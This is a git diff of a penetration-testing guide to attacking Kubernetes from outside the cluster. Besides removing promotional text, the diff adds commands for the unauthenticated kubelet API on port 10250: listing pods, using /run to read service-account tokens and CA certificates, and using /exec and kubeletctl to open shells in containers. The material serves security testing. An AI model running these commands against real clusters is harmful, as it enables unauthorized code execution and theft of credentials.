diff --git a/pentesting/pentesting-kubernetes/pentesting-kubernetes-from-the-outside.md b/pentesting/pentesting-kubernetes/pentesting-kubernetes-from-the-outside.md
index cfb94abd..becadd80 100644
--- a/pentesting/pentesting-kubernetes/pentesting-kubernetes-from-the-outside.md
+++ b/pentesting/pentesting-kubernetes/pentesting-kubernetes-from-the-outside.md
@@ -1,21 +1,5 @@
# Pentesting Kubernetes Services
-
-
-Support HackTricks and get benefits!
-
-Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
-
{% hint style="danger" %}
\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
@@ -93,6 +77,7 @@ If you find this service exposed you might have found an [**unauthenticated RCE*
```
curl -k https://:10250/metrics
curl -k https://:10250/pods
+curl -k https://:10250/runningpods/
```
If the response is `Unauthorized` then it requires authentication.
@@ -104,7 +89,7 @@ kubectl get nodes -o custom-columns='IP:.status.addresses[0].address,KUBELET_POR
ip=$(echo $node | awk '{print $1}')
port=$(echo $node | awk '{print $2}')
echo "curl -k --max-time 30 https://$ip:$port/pods"
- echo "curl -k --max-time 30 https://$ip:2379/version" #Check also for etcd
+ echo "curl -k --max-time 30 https://$ip:2379/version" #Check also for etcd
done
```
@@ -199,15 +184,30 @@ This endpoint list pods and their containers:
curl -ks https://worker:10250/pods
```
-#### /exec
+#### /exec & /run
This endpoint allows to execute code inside any container very easily:
```bash
-# Tthe command is passed as an array (split by spaces) and that is a GET request.
-curl -Gks https://worker:10250/exec/{namespace}/{pod}/{container} \
- -d 'input=1' -d 'output=1' -d 'tty=1' \
+# You can get all the namespaces, pods and containers running with:
+curl -k https://10.10.11.133:10250/pods | jq -r '.items[] | [.metadata.namespace, .metadata.name, [.spec.containers[].name]]'
+curl -k https://10.10.11.133:10250/runningpods/ | jq -r '.items[] | [.metadata.namespace, .metadata.name, [.spec.containers[].name]]'
+
+# /run
+curl -XPOST -k https://10.10.11.133:10250/run/{namespace}/{pod}/{container} \
+ -d "cmd=cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt /var/run/secrets/kubernetes.io/serviceaccount/token"
+
+# /exec
+# The command is passed as an array (split by spaces) and that is a GET request.
+curl -sk -X POST -H "X-Stream-Protocol-Version: v2.channel.k8s.io" -H "X-Stream-Protocol-Version: channel.k8s.io" \
+ https://worker:10250/exec/{namespace}/{pod}/{container} \
+ -d 'input=1' -d 'output=1' -d 'tty=1' \
-d 'command=ls' -d 'command=/'
+
+# Using kubeletctl
+## get kubeletctl from releases in https://github.com/cyberark/kubeletctl
+kubeletctl exec /bin/sh -n -p -c -s --cacert ./ca.crt
+kubeletctl exec /bin/sh -p kube-proxy-84qt4 -c kube-proxy -n kube-system -s 10.129.227.136 --cacert ./ca.crt
```
To automate the exploitation you can also use the script [**kubelet-anon-rce**](https://github.com/serain/kubelet-anon-rce).